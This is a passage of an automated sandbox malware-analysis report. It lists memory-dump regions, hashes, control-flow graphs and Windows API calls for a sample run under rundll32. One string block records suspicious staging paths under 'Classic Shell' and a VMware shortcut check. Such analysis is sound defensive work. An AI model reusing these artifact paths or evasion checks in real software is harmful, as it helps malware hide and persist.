                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFileMessageSleep
                    • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                    • API String ID: 2390311571-3073936675
                    • Opcode ID: c6a53140604d0a2ed15e4ac568e0721caa2aa8183d7ed21a9e78ca7ab6707819
                    • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                    • Opcode Fuzzy Hash: c6a53140604d0a2ed15e4ac568e0721caa2aa8183d7ed21a9e78ca7ab6707819
                    • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetLastError.KERNEL32 ref: 005115CB
                      • Part of subcall function 00436300: CreateFileW.KERNEL32 ref: 00436369
                    • GetLastError.KERNEL32 ref: 00511666
                      • Part of subcall function 0043EA00: FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                      • Part of subcall function 0043EA00: LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateFileFormatFreeLocalMessage
                    • String ID: XLM$5B
                    • API String ID: 3390516113-4037079664
                    • Opcode ID: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction ID: 9b238616e6485af7c83a0d925af92c9e45f4d60ad68d559227fbd5342f7d0e30
                    • Opcode Fuzzy Hash: 667392af4be657af5266e6cce04edf336da9085f6fcf5a3f90d6d1f32072e8dc
                    • Instruction Fuzzy Hash: 05511522101BC488EB20EF76D8903D93B62F78579CF50421AEB5D4BB9ADF74C688C385
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LeaveCriticalSection.KERNEL32 ref: 00414771
                    • EnterCriticalSection.KERNEL32 ref: 00414847
                    • LeaveCriticalSection.KERNEL32 ref: 00414880
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter
                    • String ID:
                    • API String ID: 2978645861-0
                    • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                    • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 219 436960-436983 call 411140 GetFileAttributesW 222 436989-436991 219->222 223 436a4e-436a56 GetLastError 219->223 226 436993-43699d 222->226 227 4369a2-4369a4 222->227 224 436a79-436a7c 223->224 225 436a58-436a5b 223->225 228 436a81-436a8d 224->228 225->224 229 436a5d-436a63 225->229 226->228 230 4369a6-4369db CreateFileW 227->230 231 4369f8-4369fe 227->231 229->224 234 436a65-436a68 229->234 230->228 235 4369e1-4369f3 CloseHandle 230->235 232 436a00-436a03 231->232 233 436a05-436a3a call 420600 231->233 232->228 240 436a49-436a4c 233->240 241 436a3c-436a47 call 420550 233->241 234->224 237 436a6a-436a6d 234->237 235->228 237->224 239 436a6f-436a72 237->239 239->224 242 436a74-436a77 239->242 240->228 241->228 242->224 243 436a7e 242->243 243->228
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateErrorHandleLast
                    • String ID:
                    • API String ID: 2927643983-0
                    • Opcode ID: 28ac7a88db5b09650cc3124807783d47f1c76224b3e5616c29fb8e505945dcf2
                    • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                    • Opcode Fuzzy Hash: 28ac7a88db5b09650cc3124807783d47f1c76224b3e5616c29fb8e505945dcf2
                    • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 270 43ea00-43ea29 271 43ea32-43ea66 FormatMessageW 270->271 272 43ea2b 270->272 273 43ea6c-43ea70 271->273 272->271 274 43ea72-43ea88 273->274 275 43ea90-43eab4 call 4100a0 LocalFree 273->275 276 43ea8a-43ea8e 274->276 277 43ea68 274->277 276->275 276->277 277->273
                    APIs
                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EA5D
                    • LocalFree.KERNEL32(?,?,?,?,?,?,00511679), ref: 0043EAA6
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533228177.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533243375.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533261153.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533279171.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533295179.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533312488.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533327781.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533344055.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533361206.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533378194.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533410090.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533428031.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533444564.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533461032.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533479426.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533497371.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533552895.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: FormatFreeLocalMessage
                    • String ID:
                    • API String ID: 1427518018-0
                    • Opcode ID: 02ae248dc727e5ad0abcdcd8af7b117c20e8862208e73e2bdf3d93fd01def119
                    • Instruction ID: aedc2a569021689e108d0b0ee9a9e186650f58a8dabf2e4a2fd6b9f1b34191f5
                    • Opcode Fuzzy Hash: 02ae248dc727e5ad0abcdcd8af7b117c20e8862208e73e2bdf3d93fd01def119
                    • Instruction Fuzzy Hash: 11110736600A80CED724EFBAD4443E93BA6F348B9CF50511AEA4947B58CB78C589CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                    Memory Dump Source
                    • Source File: 00000005.00000002.2532604364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.2532586504.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532604364.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532899915.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532917461.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532933329.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532948683.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532964037.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532979304.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2532998558.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533013227.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533029029.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533043653.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533058174.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533072958.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533088602.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533104301.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533120564.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533135554.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533151750.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533165974.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533181574.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533196982.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000005.00000002.2533213605.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
